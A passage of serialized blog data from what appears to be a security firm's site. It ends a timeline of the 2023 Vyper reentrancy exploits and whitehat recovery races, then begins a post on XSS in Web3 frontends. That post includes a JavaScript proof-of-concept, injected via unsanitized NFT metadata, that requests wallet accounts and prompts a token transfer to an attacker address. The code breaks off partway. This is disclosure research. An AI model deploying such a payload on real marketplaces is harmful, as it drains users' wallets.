output.",{"type":26,"tag":35,"props":33405,"children":33406},{},[33407],{"type":26,"tag":2210,"props":33408,"children":33410},{"alt":7,"src":33409},"/posts/vyper-timeline/sstore.png",[],{"type":26,"tag":35,"props":33412,"children":33413},{},[33414],{"type":32,"value":33415},"It was a race with the hackers.",{"type":26,"tag":35,"props":33417,"children":33418},{},[33419],{"type":32,"value":33420},"Thankfully, people were still confusing this for read-only reentrancy. Taken from the \"Web3 Security Alerts\" channel.",{"type":26,"tag":5503,"props":33422,"children":33423},{},[33424],{"type":26,"tag":35,"props":33425,"children":33426},{},[33427,33429],{"type":32,"value":33428},"Alchemix and Metronome DAO also been hacked due to this read-only reentrancy bug: ",{"type":26,"tag":41,"props":33430,"children":33433},{"href":33431,"rel":33432},"https://twitter.com/hexagate_/status/1685677801813217280",[45],[33434],{"type":32,"value":33431},{"type":26,"tag":35,"props":33436,"children":33437},{},[33438],{"type":32,"value":33439},"Michael identified alETH and msETH pools, which were also running 0.2.15, as being also potentially vulnerable.",{"type":26,"tag":35,"props":33441,"children":33442},{},[33443,33448,33449,33456],{"type":26,"tag":84,"props":33444,"children":33445},{},[33446],{"type":32,"value":33447},"14:50 UTC",{"type":32,"value":1011},{"type":26,"tag":41,"props":33450,"children":33453},{"href":33451,"rel":33452},"https://etherscan.io/tx/0xc93eb238ff42632525e990119d3edc7775299a70b56e54d83ec4f53736400964",[45],[33454],{"type":32,"value":33455},"msETH/ETH was drained",{"type":32,"value":470},{"type":26,"tag":35,"props":33458,"children":33459},{},[33460,33465,33466,33473],{"type":26,"tag":84,"props":33461,"children":33462},{},[33463],{"type":32,"value":33464},"15:34 UTC",{"type":32,"value":1011},{"type":26,"tag":41,"props":33467,"children":33470},{"href":33468,"rel":33469},"https://etherscan.io/tx/0xb676d789bb8b66a08105c844a49c2bcffb400e5c1cfabd4bc30cca4bff3c9801",[45],[33471],{"type":32,"value":33472},"alETH/ETH was drained",{"type":32,"value":470},{"type":26,"tag":35,"props":33475,"children":33476},{},[33477,33482,33484,33491],{"type":26,"tag":84,"props":33478,"children":33479},{},[33480],{"type":32,"value":33481},"15:43 UTC",{"type":32,"value":33483}," We identified that ",{"type":26,"tag":41,"props":33485,"children":33488},{"href":33486,"rel":33487},"https://etherscan.io/address/0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511#code",[45],[33489],{"type":32,"value":33490},"CRV/ETH was vulnerable",{"type":32,"value":33492},", compiled using Vyper version 3.0.0. It was critical that we kept the nature of affected contracts secret for as long as possible.",{"type":26,"tag":35,"props":33494,"children":33495},{},[33496,33501],{"type":26,"tag":84,"props":33497,"children":33498},{},[33499],{"type":32,"value":33500},"16:11 UTC",{"type":32,"value":33502}," We began working on a whitehat exploit.",{"type":26,"tag":35,"props":33504,"children":33505},{},[33506,33508,33515],{"type":32,"value":33507},"Unfortunately, too many groups were doing independent research in parallel and rumors were spreading. At 16:44 UTC, we decided to release a ",{"type":26,"tag":41,"props":33509,"children":33512},{"href":33510,"rel":33511},"https://twitter.com/vyperlang/status/1685692973051498497",[45],[33513],{"type":32,"value":33514},"public statement on affected versions",{"type":32,"value":470},{"type":26,"tag":35,"props":33517,"children":33518},{},[33519],{"type":32,"value":33520},"By 18:32 UTC, we had a proof of concept exploit to be used in a potential whitehat recovery. bpak from Chainlight was also working on an exploit in parallel, and shared it at 19:06 UTC.",{"type":26,"tag":35,"props":33522,"children":33523},{},[33524,33526,33533],{"type":32,"value":33525},"Five minutes later at 19:11 UTC, ",{"type":26,"tag":41,"props":33527,"children":33530},{"href":33528,"rel":33529},"https://etherscan.io/tx/0x2e7dc8b2fb7e25fd00ed9565dcc0ad4546363171d5e00f196d48103983ae477c",[45],[33531],{"type":32,"value":33532},"somebody else stole the funds",{"type":32,"value":470},{"type":26,"tag":35,"props":33535,"children":33536},{},[33537],{"type":32,"value":33538},"The attack structure was largely different from either of our proofs of concept, so it was unlikely to have been a leak from our group. Regardless, this was pretty demoralizing.",{"type":26,"tag":35,"props":33540,"children":33541},{},[33542],{"type":32,"value":33543},"Nevertheless, there was more ground to cover.",{"type":26,"tag":35,"props":33545,"children":33546},{},[33547,33552],{"type":26,"tag":84,"props":33548,"children":33549},{},[33550],{"type":32,"value":33551},"21:26 UTC",{"type":32,"value":33553}," Addison proposed an ambitious plan to recover the remaining assets in the CRVETH pool.",{"type":26,"tag":5503,"props":33555,"children":33556},{},[33557],{"type":26,"tag":35,"props":33558,"children":33559},{},[33560,33562,33566,33568,33571,33573,33576,33578],{"type":32,"value":33561},"if you send like 30k crv to the crv/eth pool ",{"type":26,"tag":33563,"props":33564,"children":33565},"br",{},[],{"type":32,"value":33567},"\nyou can then update admin fee ",{"type":26,"tag":33563,"props":33569,"children":33570},{},[],{"type":32,"value":33572},"\nand then the crv/eth rate is like .15 eth per crv ",{"type":26,"tag":33563,"props":33574,"children":33575},{},[],{"type":32,"value":33577},"\nso you can basically drain whole pool for few hundred K crv ",{"type":26,"tag":33563,"props":33579,"children":33580},{},[],{"type":26,"tag":35,"props":33582,"children":33583},{},[33584,33589],{"type":26,"tag":84,"props":33585,"children":33586},{},[33587],{"type":32,"value":33588},"21:52 UTC",{"type":32,"value":33590}," bpak had produced a working proof of concept which could recover 3100 ETH.",{"type":26,"tag":35,"props":33592,"children":33593},{},[33594,33596,33603,33605,33612,33620],{"type":32,"value":33595},"Ten minutes later at 22:02 UTC, we were beaten again. By some freak concidence, the ",{"type":26,"tag":41,"props":33597,"children":33600},{"href":33598,"rel":33599},"https://etherscan.io/address/0x8c73d39b2da2dd1a10cc16502bc7c8d768ec74c9",[45],[33601],{"type":32,"value":33602},"CRV admin fee bot",{"type":32,"value":33604}," had claimed fees and ",{"type":26,"tag":41,"props":33606,"children":33609},{"href":33607,"rel":33608},"https://etherscan.io/tx/0xcd99fadd7e28a42a063e07d9d86f67c88e10a7afe5921bd28cd1124924ae2052",[45],[33610],{"type":32,"value":33611},"the pool was drained",{"type":26,"tag":18065,"props":33613,"children":33614},{},[33615],{"type":26,"tag":41,"props":33616,"children":33618},{"href":32217,"ariaDescribedBy":33617,"dataFootnoteRef":7,"id":32219},[18072],[33619],{"type":32,"value":878},{"type":32,"value":470},{"type":26,"tag":92,"props":33622,"children":33624},{"id":33623},"blame",[33625],{"type":32,"value":33626},"Blame",{"type":26,"tag":35,"props":33628,"children":33629},{},[33630,33634],{"type":26,"tag":762,"props":33631,"children":33632},{},[33633],{"type":32,"value":33626},{"type":32,"value":33635}," is a strong word. It's not productive to point fingers. At the same time, I think it's useful to think about what could have went better.",{"type":26,"tag":118,"props":33637,"children":33639},{"id":33638},"races",[33640],{"type":32,"value":33641},"Races",{"type":26,"tag":35,"props":33643,"children":33644},{},[33645],{"type":32,"value":33646},"In both cases, whitehat efforts were beaten by less than half an hour. Sometimes every second really does count.",{"type":26,"tag":35,"props":33648,"children":33649},{},[33650],{"type":32,"value":33651},"There likely could have been better preparation and resources for executing on these attacks. At the same time, this seems like a double-edged sword. Is it really a good idea to aggregate information related how to execute a hack? Who should we trust?",{"type":26,"tag":35,"props":33653,"children":33654},{},[33655],{"type":32,"value":33656},"On the other hand, I think the process was quite efficient. We went from initial suspicions to identifying vulnerable variants in 2 hours and 4 minutes.",{"type":26,"tag":118,"props":33658,"children":33660},{"id":33659},"information-leakage",[33661],{"type":32,"value":33662},"Information Leakage",{"type":26,"tag":35,"props":33664,"children":33665},{},[33666],{"type":32,"value":33667},"I was both an auditor and a whitehat.",{"type":26,"tag":35,"props":33669,"children":33670},{},[33671,33673,33680],{"type":32,"value":33672},"There's a strong culture of publishing in auditing. We're paid for technical thought leadership and deep understanding of vulnerabilities. One way to demonstrate this is ",{"type":26,"tag":41,"props":33674,"children":33677},{"href":33675,"rel":33676},"https://twitter.com/osec_io/status/1579969927020412929",[45],[33678],{"type":32,"value":33679},"by publishing the \"scoop\"",{"type":32,"value":33681}," on hacks in the wild. Researchers cost a lot and the return on investment is publicity.",{"type":26,"tag":35,"props":33683,"children":33684},{},[33685],{"type":32,"value":33686},"On the other hand, there's a compelling argument that early disclosure of the affected versions had a material impact on the whitehat recovery.",{"type":26,"tag":35,"props":33688,"children":33689},{},[33690],{"type":32,"value":33691},"Half an hour more could have saved $18M.",{"type":26,"tag":35,"props":33693,"children":33694},{},[33695],{"type":32,"value":33696},"Auditors don't pay for externalities created by their reporting. Instead, they get rewarded with likes, retweets, and publicity. Seems like a hard problem.",{"type":26,"tag":92,"props":33698,"children":33700},{"id":33699},"next-steps",[33701],{"type":32,"value":33702},"Next Steps",{"type":26,"tag":35,"props":33704,"children":33705},{},[33706],{"type":32,"value":33707},"I disagree with takes like \"we need formal verification to solve this\". This bug could have been caught with a unit test. Formal verification is very useful for many bug classes, but I'm not convinced it's as useful for relatively simple, non-optimizing compilers.",{"type":26,"tag":35,"props":33709,"children":33710},{},[33711,33713,33720],{"type":32,"value":33712},"It's important to note that this bug ",{"type":26,"tag":41,"props":33714,"children":33717},{"href":33715,"rel":33716},"https://twitter.com/real_philogy/status/1685948253139857409",[45],[33718],{"type":32,"value":33719},"was patched since November 2021",{"type":32,"value":470},{"type":26,"tag":5503,"props":33722,"children":33723},{},[33724],{"type":26,"tag":35,"props":33725,"children":33726},{},[33727,33729,33734,33735,33738,33740,33745],{"type":32,"value":33728},"I think this Vyper 0day is less about the skill of the Vyper team or the language itself but more about ",{"type":26,"tag":762,"props":33730,"children":33731},{},[33732],{"type":32,"value":33733},"processes",{"type":32,"value":21124},{"type":26,"tag":33563,"props":33736,"children":33737},{},[],{"type":32,"value":33739},"\nThe bug was a fixed many versions of Vyper ago, the actual oversight was not realizing the potential impact to projects at the time it ",{"type":26,"tag":762,"props":33741,"children":33742},{},[33743],{"type":32,"value":33744},"was",{"type":32,"value":33746}," fixed.",{"type":26,"tag":35,"props":33748,"children":33749},{},[33750],{"type":32,"value":33751},"Unfortunately, public goods get easily forgotten. With immutable contracts, projects can have implicit dependencies on code written years ago. Protocol developers and security experts should stay up to date on security developments across the entire execution stack.",{"type":26,"tag":21015,"props":33753,"children":33755},{"className":33754,"dataFootnotes":7},[21018],[33756,33761],{"type":26,"tag":92,"props":33757,"children":33759},{"className":33758,"id":18072},[21023],[33760],{"type":32,"value":21026},{"type":26,"tag":4820,"props":33762,"children":33763},{},[33764],{"type":26,"tag":3430,"props":33765,"children":33766},{"id":32960},[33767,33769],{"type":32,"value":33768},"Thankfully, these funds were later returned. ",{"type":26,"tag":41,"props":33770,"children":33772},{"href":32988,"ariaLabel":21128,"className":33771,"dataFootnoteBackref":7},[21130],[33773],{"type":32,"value":21133},{"type":26,"tag":7949,"props":33775,"children":33776},{},[33777],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":33779},[33780,33781,33785,33786],{"id":33055,"depth":5412,"text":33058},{"id":33623,"depth":5412,"text":33626,"children":33782},[33783,33784],{"id":33638,"depth":5417,"text":33641},{"id":33659,"depth":5417,"text":33662},{"id":33699,"depth":5412,"text":33702},{"id":18072,"depth":5412,"text":21026},"content:blog:2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline",{"_path":33791,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":33792,"description":33793,"author":33794,"image":33797,"date":33799,"isFeatured":18,"tags":33800,"onBlogPage":18,"body":33803,"_type":5433,"_id":38014,"_source":5435,"_file":38015,"_stem":38016,"_extension":5438},"/blog/2023-08-11-web2-bug-repellant-instructions","Web2 Bug Repellant Instructions","An analysis of security risks that don’t get enough attention - web2 bugs in web3 apps. We take a deep and practical look at vulnerabilities across various applications.",[33795,33796],"caue","bruno",{"src":33798,"height":17,"width":17},"/posts/web2-bug-repellant-instructions/web2-bug-repellant-instructions.jpg","2023-08-11",[33801,33802],"nft-marketplaces","xss",{"type":23,"children":33804,"toc":37997},[33805,33809,33814,33818,33823,33828,33833,33849,33855,33868,33890,33897,33902,33909,33914,33920,33925,33930,33935,33940,33951,33956,34925,34935,34947,34954,34959,35780,35785,35790,35795,35800,36584,36589,36671,36676,36745,36751,36756,36761,36988,37001,37006,37011,37016,37023,37028,37035,37041,37046,37051,37056,37375,37380,37386,37402,37408,37413,37418,37428,37433,37438,37447,37452,37458,37474,37487,37492,37497,37517,37524,37529,37536,37545,37550,37571,37624,37629,37680,37694,37699,37713,37828,37851,37935,37958,37963,37968,37972,37977,37982,37988,37993],{"type":26,"tag":92,"props":33806,"children":33807},{"id":31609},[33808],{"type":32,"value":31612},{"type":26,"tag":35,"props":33810,"children":33811},{},[33812],{"type":32,"value":33813},"Transitioning to a fully decentralized web is hard. Many Web 3 applications still have large, unexplored Web 2 attack surfaces.",{"type":26,"tag":118,"props":33815,"children":33816},{"id":5488},[33817],{"type":32,"value":5491},{"type":26,"tag":35,"props":33819,"children":33820},{},[33821],{"type":32,"value":33822},"In this blog post, we'll explore these lingering threats and potential mitigations. This work summarizes our internal research against various applications, from NFT marketplaces to wallets to protocol frontends.",{"type":26,"tag":35,"props":33824,"children":33825},{},[33826],{"type":32,"value":33827},"As a note, generally applications with non-trivial frontends are more susceptible to these vulnerabilities. Hence, a lot of our research focused on the interactions with NFTs, an ideal Web 2.5 candidate in many senses.",{"type":26,"tag":92,"props":33829,"children":33830},{"id":33802},[33831],{"type":32,"value":33832},"XSS",{"type":26,"tag":35,"props":33834,"children":33835},{},[33836],{"type":26,"tag":762,"props":33837,"children":33838},{},[33839,33841,33848],{"type":32,"value":33840},"I cannot make you understand. I cannot make anyone understand what is happening inside me. I cannot ",{"type":26,"tag":41,"props":33842,"children":33845},{"href":33843,"rel":33844},"https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting",[45],[33846],{"type":32,"value":33847},"even explain it to myself",{"type":32,"value":470},{"type":26,"tag":118,"props":33850,"children":33852},{"id":33851},"managing-metadata",[33853],{"type":32,"value":33854},"Managing Metadata",{"type":26,"tag":35,"props":33856,"children":33857},{},[33858,33860,33867],{"type":32,"value":33859},"Effectively managing metadata is a challenge. When improperly sanitized, unsuspecting metadata becomes a dangerous sink for malicious ",{"type":26,"tag":41,"props":33861,"children":33864},{"href":33862,"rel":33863},"https://www.vice.com/en/article/xgdvaz/nft-steal-ip-address-opensea",[45],[33865],{"type":32,"value":33866},"payloads",{"type":32,"value":470},{"type":26,"tag":35,"props":33869,"children":33870},{},[33871,33873,33880,33882,33888],{"type":32,"value":33872},"We showcase this vulnerability in the ",{"type":26,"tag":41,"props":33874,"children":33877},{"href":33875,"rel":33876},"https://rocki.com/",[45],[33878],{"type":32,"value":33879},"Rocki Marketplace",{"type":32,"value":33881},". The ",{"type":26,"tag":130,"props":33883,"children":33885},{"className":33884},[],[33886],{"type":32,"value":33887},"artistDescription",{"type":32,"value":33889}," parameter was improperly sanitized, allowing arbitrary HTML input without any validation checks!",{"type":26,"tag":35,"props":33891,"children":33892},{},[33893],{"type":26,"tag":2210,"props":33894,"children":33896},{"alt":7,"src":33895},"/posts/web2-bug-repellant-instructions/metadata.png",[],{"type":26,"tag":35,"props":33898,"children":33899},{},[33900],{"type":32,"value":33901},"When a user loads such a maliciously constructed NFT, they'll unwittingly execute our payload, giving us full control over their account.",{"type":26,"tag":35,"props":33903,"children":33904},{},[33905],{"type":26,"tag":2210,"props":33906,"children":33908},{"alt":7,"src":33907},"/posts/web2-bug-repellant-instructions/xss.png",[],{"type":26,"tag":35,"props":33910,"children":33911},{},[33912],{"type":32,"value":33913},"Of course, this is merely a toy payload. An actual hacker could use this to spread through the marketplace, creating a wormable payload that takes over the entire website.",{"type":26,"tag":118,"props":33915,"children":33917},{"id":33916},"wheres-my-wallet",[33918],{"type":32,"value":33919},"Where's My Wallet",{"type":26,"tag":35,"props":33921,"children":33922},{},[33923],{"type":32,"value":33924},"What's the worst that can happen? How does losing your wallet funds sound?",{"type":26,"tag":35,"props":33926,"children":33927},{},[33928],{"type":32,"value":33929},"Note that triggering this exploit requires some interaction. However, in practice users likely are not carefully examining the wallet prompts, especially on familiar sites.",{"type":26,"tag":35,"props":33931,"children":33932},{},[33933],{"type":32,"value":33934},"It is important to recognize that the presence of XSS in marketplaces can trigger the approval prompt in various wallets, including the attacker's assets.",{"type":26,"tag":35,"props":33936,"children":33937},{},[33938],{"type":32,"value":33939},"In the following example, this malicious transaction was initiated by a malicious code injected into rocki.com.",{"type":26,"tag":33941,"props":33942,"children":33944},"div",{"style":33943},"display:flex; align-items:center; flex-direction:column;",[33945],{"type":26,"tag":2210,"props":33946,"children":33950},{"src":33947,"alt":33948,"style":33949},"/posts/web2-bug-repellant-instructions/metamask.png","Wallet","max-height:550px;",[],{"type":26,"tag":35,"props":33952,"children":33953},{},[33954],{"type":32,"value":33955},"And here we can find the code used to achieve it :",{"type":26,"tag":5512,"props":33957,"children":33961},{"className":33958,"code":33959,"language":33960,"meta":7,"style":7},"language-js shiki shiki-themes slack-dark","function request() {\n  if (typeof window.ethereum === 'undefined') {\n    console.error('Please install MetaMask to use this feature.');\n  } else {\n    ethereum.request({ method: 'eth_requestAccounts' }).then((accounts) => {\n      const fromAddress = accounts[0];\n      const attackerAddress = '0x0000000000000000000000000000000000000000';\n      const contractAddress = '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3';\n\n      let tokenAbi = [\n        {\n          constant: false,\n          inputs: [\n            {\n              name: '_to',\n              type: 'address',\n            },\n            {\n              name: '_value',\n              type: 'uint256',\n            },\n          ],\n          name: 'transfer',\n          outputs: [\n            {\n              name: '',\n              type: 'bool',\n            },\n          ],\n          type: 'function',\n        },\n      ];\n\n      const web3 = new Web3(window.ethereum);\n\n      const tokenContract = new web3.eth.Contract(tokenAbi, contractAddress);\n\n      const transactionObject = {\n        from: fromAddress,\n        to: contractAddress,\n        data: tokenContract.methods\n          .transfer(attackerAddress, web3.utils.toWei('100000000', 'ether'))\n          .encodeABI(),\n      };\n\n      web3.eth.sendTransaction(transactionObject);\n    });\n  }\n}\n\nimport('https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js');\nsetTimeout(request, 1e3);\n","js",[33962],{"type":26,"tag":130,"props":33963,"children":33964},{"__ignoreMap":7},[33965,33982,34027,34056,34072,34135,34170,34195,34220,34227,34247,34255,34271,34283,34291,34308,34325,34333,34340,34356,34372,34379,34387,34404,34416,34423,34439,34455,34462,34469,34486,34493,34501,34508,34555,34562,34626,34633,34653,34669,34685,34706,34777,34793,34800,34807,34845,34853,34860,34867,34874,34895],{"type":26,"tag":137,"props":33966,"children":33967},{"class":5559,"line":5560},[33968,33973,33978],{"type":26,"tag":137,"props":33969,"children":33970},{"style":5573},[33971],{"type":32,"value":33972},"function",{"type":26,"tag":137,"props":33974,"children":33975},{"style":5682},[33976],{"type":32,"value":33977}," request",{"type":26,"tag":137,"props":33979,"children":33980},{"style":5601},[33981],{"type":32,"value":18328},{"type":26,"tag":137,"props":33983,"children":33984},{"class":5559,"line":5412},[33985,33990,33994,33999,34004,34008,34013,34018,34023],{"type":26,"tag":137,"props":33986,"children":33987},{"style":5610},[33988],{"type":32,"value":33989},"  if",{"type":26,"tag":137,"props":33991,"children":33992},{"style":5601},[33993],{"type":32,"value":4625},{"type":26,"tag":137,"props":33995,"children":33996},{"style":5573},[33997],{"type":32,"value":33998},"typeof",{"type":26,"tag":137,"props":34000,"children":34001},{"style":5584},[34002],{"type":32,"value":34003}," window",{"type":26,"tag":137,"props":34005,"children":34006},{"style":5601},[34007],{"type":32,"value":470},{"type":26,"tag":137,"props":34009,"children":34010},{"style":5584},[34011],{"type":32,"value":34012},"ethereum",{"type":26,"tag":137,"props":34014,"children":34015},{"style":5590},[34016],{"type":32,"value":34017}," ===",{"type":26,"tag":137,"props":34019,"children":34020},{"style":6837},[34021],{"type":32,"value":34022}," 'undefined'",{"type":26,"tag":137,"props":34024,"children":34025},{"style":5601},[34026],{"type":32,"value":17395},{"type":26,"tag":137,"props":34028,"children":34029},{"class":5559,"line":5417},[34030,34035,34039,34043,34047,34052],{"type":26,"tag":137,"props":34031,"children":34032},{"style":5584},[34033],{"type":32,"value":34034},"    console",{"type":26,"tag":137,"props":34036,"children":34037},{"style":5601},[34038],{"type":32,"value":470},{"type":26,"tag":137,"props":34040,"children":34041},{"style":5682},[34042],{"type":32,"value":17455},{"type":26,"tag":137,"props":34044,"children":34045},{"style":5601},[34046],{"type":32,"value":165},{"type":26,"tag":137,"props":34048,"children":34049},{"style":6837},[34050],{"type":32,"value":34051},"'Please install MetaMask to use this feature.'",{"type":26,"tag":137,"props":34053,"children":34054},{"style":5601},[34055],{"type":32,"value":6430},{"type":26,"tag":137,"props":34057,"children":34058},{"class":5559,"line":5642},[34059,34064,34068],{"type":26,"tag":137,"props":34060,"children":34061},{"style":5601},[34062],{"type":32,"value":34063},"  } ",{"type":26,"tag":137,"props":34065,"children":34066},{"style":5610},[34067],{"type":32,"value":5902},{"type":26,"tag":137,"props":34069,"children":34070},{"style":5601},[34071],{"type":32,"value":5875},{"type":26,"tag":137,"props":34073,"children":34074},{"class":5559,"line":5745},[34075,34080,34084,34089,34094,34099,34104,34109,34114,34119,34123,34127,34131],{"type":26,"tag":137,"props":34076,"children":34077},{"style":5584},[34078],{"type":32,"value":34079},"    ethereum",{"type":26,"tag":137,"props":34081,"children":34082},{"style":5601},[34083],{"type":32,"value":470},{"type":26,"tag":137,"props":34085,"children":34086},{"style":5682},[34087],{"type":32,"value":34088},"request",{"type":26,"tag":137,"props":34090,"children":34091},{"style":5601},[34092],{"type":32,"value":34093},"({ ",{"type":26,"tag":137,"props":34095,"children":34096},{"style":5584},[34097],{"type":32,"value":34098},"method:",{"type":26,"tag":137,"props":34100,"children":34101},{"style":6837},[34102],{"type":32,"value":34103}," 'eth_requestAccounts'",{"type":26,"tag":137,"props":34105,"children":34106},{"style":5601},[34107],{"type":32,"value":34108}," }).",{"type":26,"tag":137,"props":34110,"children":34111},{"style":5682},[34112],{"type":32,"value":34113},"then",{"type":26,"tag":137,"props":34115,"children":34116},{"style":5601},[34117],{"type":32,"value":34118},"((",{"type":26,"tag":137,"props":34120,"children":34121},{"style":5584},[34122],{"type":32,"value":17266},{"type":26,"tag":137,"props":34124,"children":34125},{"style":5601},[34126],{"type":32,"value":5671},{"type":26,"tag":137,"props":34128,"children":34129},{"style":5573},[34130],{"type":32,"value":17413},{"type":26,"tag":137,"props":34132,"children":34133},{"style":5601},[34134],{"type":32,"value":5875},{"type":26,"tag":137,"props":34136,"children":34137},{"class":5559,"line":5850},[34138,34143,34148,34152,34157,34161,34165],{"type":26,"tag":137,"props":34139,"children":34140},{"style":5573},[34141],{"type":32,"value":34142},"      const",{"type":26,"tag":137,"props":34144,"children":34145},{"style":5584},[34146],{"type":32,"value":34147}," fromAddress",{"type":26,"tag":137,"props":34149,"children":34150},{"style":5590},[34151],{"type":32,"value":5593},{"type":26,"tag":137,"props":34153,"children":34154},{"style":5584},[34155],{"type":32,"value":34156}," accounts",{"type":26,"tag":137,"props":34158,"children":34159},{"style":5601},[34160],{"type":32,"value":3016},{"type":26,"tag":137,"props":34162,"children":34163},{"style":5626},[34164],{"type":32,"value":1817},{"type":26,"tag":137,"props":34166,"children":34167},{"style":5601},[34168],{"type":32,"value":34169},"];\n",{"type":26,"tag":137,"props":34171,"children":34172},{"class":5559,"line":5878},[34173,34177,34182,34186,34191],{"type":26,"tag":137,"props":34174,"children":34175},{"style":5573},[34176],{"type":32,"value":34142},{"type":26,"tag":137,"props":34178,"children":34179},{"style":5584},[34180],{"type":32,"value":34181}," attackerAddress",{"type":26,"tag":137,"props":34183,"children":34184},{"style":5590},[34185],{"type":32,"value":5593},{"type":26,"tag":137,"props":34187,"children":34188},{"style":6837},[34189],{"type":32,"value":34190}," '0x0000000000000000000000000000000000000000'",{"type":26,"tag":137,"props":34192,"children":34193},{"style":5601},[34194],{"type":32,"value":5604},{"type":26,"tag":137,"props":34196,"children":34197},{"class":5559,"line":5891},[34198,34202,34207,34211,34216],{"type":26,"tag":137,"props":34199,"children":34200},{"style":5573},[34201],{"type":32,"value":34142},{"type":26,"tag":137,"props":34203,"children":34204},{"style":5584},[34205],{"type":32,"value":34206}," contractAddress",{"type":26,"tag":137,"props":34208,"children":34209},{"style":5590},[34210],{"type":32,"value":5593},{"type":26,"tag":137,"props":34212,"children":34213},{"style":6837},[34214],{"type":32,"value":34215}," '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3'",{"type":26,"tag":137,"props":34217,"children":34218},{"style":5601},[34219],{"type":32,"value":5604},{"type":26,"tag":137,"props":34221,"children":34222},{"class":5559,"line":5909},[34223],{"type":26,"tag":137,"props":34224,"children":34225},{"emptyLinePlaceholder":18},[34226],{"type":32,"value":6276},{"type":26,"tag":137,"props":34228,"children":34229},{"class":5559,"line":5930},[34230,34234,34239,34243],{"type":26,"tag":137,"props":34231,"children":34232},{"style":5573},[34233],{"type":32,"value":10660},{"type":26,"tag":137,"props":34235,"children":34236},{"style":5584},[34237],{"type":32,"value":34238}," tokenAbi",{"type":26,"tag":137,"props":34240,"children":34241},{"style":5590},[34242],{"type":32,"value":5593},{"type":26,"tag":137,"props":34244,"children":34245},{"style":5601},[34246],{"type":32,"value":28213},{"type":26,"tag":137,"props":34248,"children":34249},{"class":5559,"line":5939},[34250],{"type":26,"tag":137,"props":34251,"children":34252},{"style":5601},[34253],{"type":32,"value":34254},"        {\n",{"type":26,"tag":137,"props":34256,"children":34257},{"class":5559,"line":6191},[34258,34263,34267],{"type":26,"tag":137,"props":34259,"children":34260},{"style":5584},[34261],{"type":32,"value":34262},"          constant:",{"type":26,"tag":137,"props":34264,"children":34265},{"style":5573},[34266],{"type":32,"value":11645},{"type":26,"tag":137,"props":34268,"children":34269},{"style":5601},[34270],{"type":32,"value":6099},{"type":26,"tag":137,"props":34272,"children":34273},{"class":5559,"line":6208},[34274,34279],{"type":26,"tag":137,"props":34275,"children":34276},{"style":5584},[34277],{"type":32,"value":34278},"          inputs:",{"type":26,"tag":137,"props":34280,"children":34281},{"style":5601},[34282],{"type":32,"value":28213},{"type":26,"tag":137,"props":34284,"children":34285},{"class":5559,"line":6225},[34286],{"type":26,"tag":137,"props":34287,"children":34288},{"style":5601},[34289],{"type":32,"value":34290},"            {\n",{"type":26,"tag":137,"props":34292,"children":34293},{"class":5559,"line":6238},[34294,34299,34304],{"type":26,"tag":137,"props":34295,"children":34296},{"style":5584},[34297],{"type":32,"value":34298},"              name:",{"type":26,"tag":137,"props":34300,"children":34301},{"style":6837},[34302],{"type":32,"value":34303}," '_to'",{"type":26,"tag":137,"props":34305,"children":34306},{"style":5601},[34307],{"type":32,"value":6099},{"type":26,"tag":137,"props":34309,"children":34310},{"class":5559,"line":6247},[34311,34316,34321],{"type":26,"tag":137,"props":34312,"children":34313},{"style":5584},[34314],{"type":32,"value":34315},"              type:",{"type":26,"tag":137,"props":34317,"children":34318},{"style":6837},[34319],{"type":32,"value":34320}," 'address'",{"type":26,"tag":137,"props":34322,"children":34323},{"style":5601},[34324],{"type":32,"value":6099},{"type":26,"tag":137,"props":34326,"children":34327},{"class":5559,"line":6270},[34328],{"type":26,"tag":137,"props":34329,"children":34330},{"style":5601},[34331],{"type":32,"value":34332},"            },\n",{"type":26,"tag":137,"props":34334,"children":34335},{"class":5559,"line":6279},[34336],{"type":26,"tag":137,"props":34337,"children":34338},{"style":5601},[34339],{"type":32,"value":34290},{"type":26,"tag":137,"props":34341,"children":34342},{"class":5559,"line":6288},[34343,34347,34352],{"type":26,"tag":137,"props":34344,"children":34345},{"style":5584},[34346],{"type":32,"value":34298},{"type":26,"tag":137,"props":34348,"children":34349},{"style":6837},[34350],{"type":32,"value":34351}," '_value'",{"type":26,"tag":137,"props":34353,"children":34354},{"style":5601},[34355],{"type":32,"value":6099},{"type":26,"tag":137,"props":34357,"children":34358},{"class":5559,"line":6355},[34359,34363,34368],{"type":26,"tag":137,"props":34360,"children":34361},{"style":5584},[34362],{"type":32,"value":34315},{"type":26,"tag":137,"props":34364,"children":34365},{"style":6837},[34366],{"type":32,"value":34367}," 'uint256'",{"type":26,"tag":137,"props":34369,"children":34370},{"style":5601},[34371],{"type":32,"value":6099},{"type":26,"tag":137,"props":34373,"children":34374},{"class":5559,"line":6363},[34375],{"type":26,"tag":137,"props":34376,"children":34377},{"style":5601},[34378],{"type":32,"value":34332},{"type":26,"tag":137,"props":34380,"children":34381},{"class":5559,"line":6393},[34382],{"type":26,"tag":137,"props":34383,"children":34384},{"style":5601},[34385],{"type":32,"value":34386},"          ],\n",{"type":26,"tag":137,"props":34388,"children":34389},{"class":5559,"line":6401},[34390,34395,34400],{"type":26,"tag":137,"props":34391,"children":34392},{"style":5584},[34393],{"type":32,"value":34394},"          name:",{"type":26,"tag":137,"props":34396,"children":34397},{"style":6837},[34398],{"type":32,"value":34399}," 'transfer'",{"type":26,"tag":137,"props":34401,"children":34402},{"style":5601},[34403],{"type":32,"value":6099},{"type":26,"tag":137,"props":34405,"children":34406},{"class":5559,"line":6433},[34407,34412],{"type":26,"tag":137,"props":34408,"children":34409},{"style":5584},[34410],{"type":32,"value":34411},"          outputs:",{"type":26,"tag":137,"props":34413,"children":34414},{"style":5601},[34415],{"type":32,"value":28213},{"type":26,"tag":137,"props":34417,"children":34418},{"class":5559,"line":6441},[34419],{"type":26,"tag":137,"props":34420,"children":34421},{"style":5601},[34422],{"type":32,"value":34290},{"type":26,"tag":137,"props":34424,"children":34425},{"class":5559,"line":6501},[34426,34430,34435],{"type":26,"tag":137,"props":34427,"children":34428},{"style":5584},[34429],{"type":32,"value":34298},{"type":26,"tag":137,"props":34431,"children":34432},{"style":6837},[34433],{"type":32,"value":34434}," 